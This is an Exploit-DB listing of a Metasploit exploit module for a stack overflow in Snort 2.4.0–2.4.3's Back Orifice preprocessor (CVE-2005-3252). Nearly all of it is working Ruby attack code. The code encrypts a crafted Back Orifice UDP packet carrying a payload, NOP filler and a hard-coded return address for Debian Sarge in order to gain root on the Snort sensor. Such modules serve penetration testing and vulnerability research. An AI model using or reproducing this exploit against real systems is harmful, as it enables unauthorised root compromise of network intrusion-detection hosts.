Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)

EDB-ID:

10026




Platform:

Linux

Date:

2005-10-18


##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'    => %q{
				This module exploits a stack overflow in the Back Orifice pre-processor module
			included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could 
			be used to completely compromise a Snort sensor, and would typically gain an attacker
			full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'        =>
				{
					'Space'    => 1073, #ret : 1069 
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0))
	

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)

	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp
		
		boheader =      
			"*!*QWTY?"  +
			[1096].pack("V")  +           # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+           # ID
			"\x01"                        # PING
		
		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)
		
		handler
		disconnect_udp
	end

end